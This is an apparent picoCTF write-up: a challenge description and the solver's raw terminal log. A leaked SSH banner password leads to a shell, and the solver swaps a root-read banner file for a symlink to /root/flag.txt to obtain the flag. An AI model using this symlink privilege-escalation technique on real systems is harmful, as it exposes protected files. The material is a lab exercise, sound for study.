Description
Can you abuse the banner?
The server has been leaking some crucial information on tethys.picoctf.net 64216. Use the leaked information to get to the server.
To connect to the running application use nc tethys.picoctf.net 54849. From the above information abuse the machine and find the flag in the /root directory.

diva_bs-picoctf@webshell:~$ nc tethys.picoctf.net 59223
SSH-2.0-OpenSSH_7.6p1 My_Passw@rd_@1234
^C
diva_bs-picoctf@webshell:~$ nc tethys.picoctf.net 55236
*************************************
**************WELCOME****************
*************************************

what is the password? 
^C
diva_bs-picoctf@webshell:~$ nc tethys.picoctf.net 55236
*************************************
**************WELCOME****************
*************************************

what is the password? 
My_Passw@rd_@1234
What is the top cyber security conference in the world?
defcon
the first hacker ever was known for phreaking(making free phone calls), who was it?
john draper
player@challenge:~$ ls
ls
banner  text
player@challenge:~$ cat banner text
cat banner text
*************************************
**************WELCOME****************
*************************************
keep digging
player@challenge:~$ ls -la
ls -la
total 20
drwxr-xr-x 1 player player   20 Mar  9 16:39 .
drwxr-xr-x 1 root   root     20 Mar  9 16:39 ..
-rw-r--r-- 1 player player  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 player player 3771 Apr  4  2018 .bashrc
-rw-r--r-- 1 player player  807 Apr  4  2018 .profile
-rw-r--r-- 1 player player  114 Feb  7 17:25 banner
-rw-r--r-- 1 root   root     13 Feb  7 17:25 text
player@challenge:~$ ls -la ./root
ls -la ./root
ls: cannot access './root': No such file or directory
player@challenge:~$ ls -la /root
ls -la /root
total 16
drwxr-xr-x 1 root root    6 Mar  9 16:39 .
drwxr-xr-x 1 root root   29 Aug  5 16:39 ..
-rw-r--r-- 1 root root 3106 Apr  9  2018 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
-rwx------ 1 root root   46 Mar  9 16:39 flag.txt
-rw-r--r-- 1 root root 1317 Feb  7 17:25 script.py
player@challenge:~$ cat /root/script.py
cat /root/script.py

import os
import pty

incorrect_ans_reply = "Lol, good try, try again and good luck\n"

if __name__ == "__main__":
    try:
      with open("/home/player/banner", "r") as f:
        print(f.read())
    except:
      print("*********************************************")
      print("***************DEFAULT BANNER****************")
      print("*Please supply banner in /home/player/banner*")
      print("*********************************************")

try:
    request = input("what is the password? \n").upper()
    while request:
        if request == 'MY_PASSW@RD_@1234':
            text = input("What is the top cyber security conference in the world?\n").upper()
            if text == 'DEFCON' or text == 'DEF CON':
                output = input(
                    "the first hacker ever was known for phreaking(making free phone calls), who was it?\n").upper()
                if output == 'JOHN DRAPER' or output == 'JOHN THOMAS DRAPER' or output == 'JOHN' or output== 'DRAPER':
                    scmd = 'su - player'
                    pty.spawn(scmd.split(' '))

                else:
                    print(incorrect_ans_reply)
            else:
                print(incorrect_ans_reply)
        else:
            print(incorrect_ans_reply)
            break

except:
    KeyboardInterrupt

player@challenge:~$ ln -s /root/flag.txt
ln -s /root/flag.txt
player@challenge:~$ ln -s /root/flag.txt link 
ln -s /root/flag.txt link
player@challenge:~$ ls
ls
banner  flag.txt  link  text
player@challenge:~$ cat flag.txt
cat flag.txt
cat: flag.txt: Permission denied
player@challenge:~$ rm flag.txt
rm flag.txt
player@challenge:~$ ls
ls
banner  link  text
player@challenge:~$ cat link
cat link
cat: link: Permission denied
player@challenge:~$ cat $(readlink -f link)
cat $(readlink -f link)
cat: /root/flag.txt: Permission denied
player@challenge:~$ cp link banner.txt
cp link banner.txt
cp: cannot open 'link' for reading: Permission denied
player@challenge:~$ echo test text > banner
echo test text > banner
player@challenge:~$ cat banner
cat banner
test text
player@challenge:~$ link - > /root/flag.txt
link - > /root/flag.txt
-su: /root/flag.txt: Permission denied
player@challenge:~$ ln -s /root/flag.txt banner
ln -s /root/flag.txt banner
ln: failed to create symbolic link 'banner': File exists
player@challenge:~$ rm banner
rm banner
player@challenge:~$ ln -s /root/flag.txt banner
ln -s /root/flag.txt banner
diva_bs-picoctf@webshell:~$ nc tethys.picoctf.net 55236
picoCTF{b4nn3r_gr4bb1n9_su((3sfu11y_8126c9b0}

what is the password? 
